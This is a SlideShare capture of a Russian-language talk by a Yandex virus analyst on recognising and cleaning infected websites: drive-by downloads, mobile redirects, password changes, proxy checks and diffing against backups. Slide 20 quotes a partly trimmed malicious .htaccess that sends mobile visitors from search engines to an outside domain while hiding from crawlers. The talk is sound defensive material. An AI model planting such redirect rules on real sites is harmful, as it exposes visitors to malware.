Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads.
Мой сайт заражен,
что делать?

Андрей Ковалев
Вирусный аналитик
avkov@yandex-team.ru
Что значит заражен?

2
Все равно?

!

3

99 % пользователей поиска не переходят на
зараженные сайты!
Не только поиск, браузер, но и:

4
Drive-by-download
Особенности
реализации:

! 

Скрытая загрузка
вредоносных страниц

! 

Использование
Traffic Distributio...
Redirect and mobile redirect
Особенности
реализации:

! 

! 

Введение
пользователя в
заблуждение

! 

6

Выполнение атаки...
Как поймать вредоносный код?
Несколько простых правил
Прежде чем что-либо делать, необходимо:

!
! 

Поменять пароли к базе данных сайта (phpmyadmin)

! 

Поменять пароли к пан...
Вебмастер – скорая помощь!
Используйте Вебмастер,
чтобы:

! 
! 

Посмотреть примеры
кода, которые
актуальны для
вердикта

...
Сомневаешься, проверь свой сайт!

10
Узнай, что нужно искать!

11
Как проверить самому?
! 
! 

Использовать веб-прокси(Fiddler, HandyCache) для
отслеживания загрузки в браузер любого конте...
Веб-прокси в действии:

13
Что искать на веб-странице?

! 

Подключение удаленных веб-страниц через <iframe src
<script src

! 
! 

14

Заражение поп...
Размещение вредоносного swf-файла:

15
А что тут такого страшного?

16
Обфусцированный вредоносный js

17
Что искать на веб-сервере?
! 
! 

Модификацию серверных скриптов и файлов вебприложения (поискать подозрительные скрипты с...
Пример вредоносного php

19
Пример вредоносного .htaccess
RewriteEngine On
…
RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR]
RewriteCond %{HTTP_USER_AGE...
Если есть backup веб-приложения:

! 

Сравнить дистрибутив сайта и его backup по
набору файлов

! 

Проверить разницу файл...
Проверка изменений с помощью DIFF:

22
Веб-прокси (Fiddler2)

Diff checker

http://fiddler2.com/get-fiddler/

http://www.diffchecker.som/

23
Блог проекта

http://safesearch.ya.ru/

Раздел «Безопасность» в Яндекс.Вебмастер

24

http://help.yandex.ru/webmaster/
Мы всегда рады образцам серверного вредоносного кода

virus-samples@yandexteam.ru
Yandex SafeBrowsing API

25

http://safe...
Спасибо!
Вопросы?
Upcoming SlideShare
Loading in …5
×

Андрей Ковалев - Безопасность сайта: мифы и реальность

2,531 views

Published on

В поисковой выдаче Яндекса иногда можно встретить предупреждения о том, что сайт может быть небезопасен для компьютера или мобильного устройства пользователя. О том, что это значит, где найти вредоносный код и как его удалить, вы услышите из первых уст — от вирусного аналитика Яндекса.

  • Be the first to comment

Андрей Ковалев - Безопасность сайта: мифы и реальность

  1. 1. Мой сайт заражен, что делать? Андрей Ковалев Вирусный аналитик [email protected]
  2. Что значит заражен? 2
  3. Все равно? ! 3 99 % пользователей поиска не переходят на зараженные сайты!
  4. Не только поиск, браузер, но и: 4
  5. Drive-by-download Особенности реализации: !  Скрытая загрузка вредоносных страниц !  Использование Traffic Distributionсистем !  Установка вредоносного ПО как результат проведения атаки 5
  6. Redirect and mobile redirect Особенности реализации: !  !  Введение пользователя в заблуждение !  6 Выполнение атаки только для целевой аудитории Установка вредоносного ПО осуществляется только самим пользователем
  7. Как поймать вредоносный код? Несколько простых правил
  8. Прежде чем что-либо делать, необходимо: ! !  Поменять пароли к базе данных сайта (phpmyadmin) !  Поменять пароли к панели администратора сайта !  Установить обновления CMS и плагинов !  8 Поменять пароли к ftp- и ssh-сервисам сайта Установить обновления / обновления безопасности ключевых сервисов сайта и ОС
  9. Вебмастер – скорая помощь! Используйте Вебмастер, чтобы: !  !  Посмотреть примеры кода, которые актуальны для вердикта !  9 Вовремя узнавать о заражении сайта Отправить сайт на перепроверку, и связаться с поддержкой
  10. Сомневаешься, проверь свой сайт! 10
  11. Узнай, что нужно искать! 11
  12. Как проверить самому? !  !  Использовать веб-прокси(Fiddler, HandyCache) для отслеживания загрузки в браузер любого контента !  12 Зайти на свой сайт из поиска с удаленными cookies и очищенным кэшем Сменить User-Agent (Firefox User Agent Changer) на мобильный и попробовать зайти снова
  13. Веб-прокси в действии: 13
  14. Что искать на веб-странице? !  Подключение удаленных веб-страниц через <iframe src <script src !  !  14 Заражение популярных js библиотек Размещение на сайте вредоносных swf и
  15. Размещение вредоносного swf-файла: 15
  16. А что тут такого страшного? 16
  17. Обфусцированный вредоносный js 17
  18. Что искать на веб-сервере? !  !  Модификацию серверных скриптов и файлов вебприложения (поискать подозрительные скрипты с обфускацией) !  18 Модификацию файлов .htaccess (найти и проверить во всех директориях веб-сервера) Модификацию бинарных файлов веб-сервера и его модулей (проверить дату модификации, новые модули в конфигах)
  19. Пример вредоносного php 19
  20. Пример вредоносного .htaccess RewriteEngine On … RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR] RewriteCond %{HTTP_USER_AGENT} android [NC,OR] RewriteCond %{HTTP_USER_AGENT} iPhone [NC,OR] RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR] … RewriteCond %{HTTP_USER_AGENT} !google [NC] RewriteCond %{HTTP_USER_AGENT} !yandex [NC] RewriteCond %{HTTP_USER_AGENT} !bot [NC] … [L,R=302] RewriteCond %{HTTP_REFERER} ^http://www.yandex.ru/ [OR] RewriteCond %{HTTP_REFERER} ^http://google.com/ [OR] … RewriteRule ^(.*)$ http://qo0.ru/?1&source=%{HTTP_HOST} [L,R=302] 20
  21. Если есть backup веб-приложения: !  Сравнить дистрибутив сайта и его backup по набору файлов !  Проверить разницу файлов с помощью DIFF !  !  21 Удалить найденный подозрительный код и / или новые подозрительные файлы Восстановить сайт из backup’а
  22. Проверка изменений с помощью DIFF: 22
  23. Веб-прокси (Fiddler2) Diff checker http://fiddler2.com/get-fiddler/ http://www.diffchecker.som/ 23
  24. Блог проекта http://safesearch.ya.ru/ Раздел «Безопасность» в Яндекс.Вебмастер 24 http://help.yandex.ru/webmaster/
  25. Мы всегда рады образцам серверного вредоносного кода [email protected] Yandex SafeBrowsing API 25 http://safe.yandex.ru/
  26. Спасибо! Вопросы?
интернет магазин велосипедов

http://220km.net

×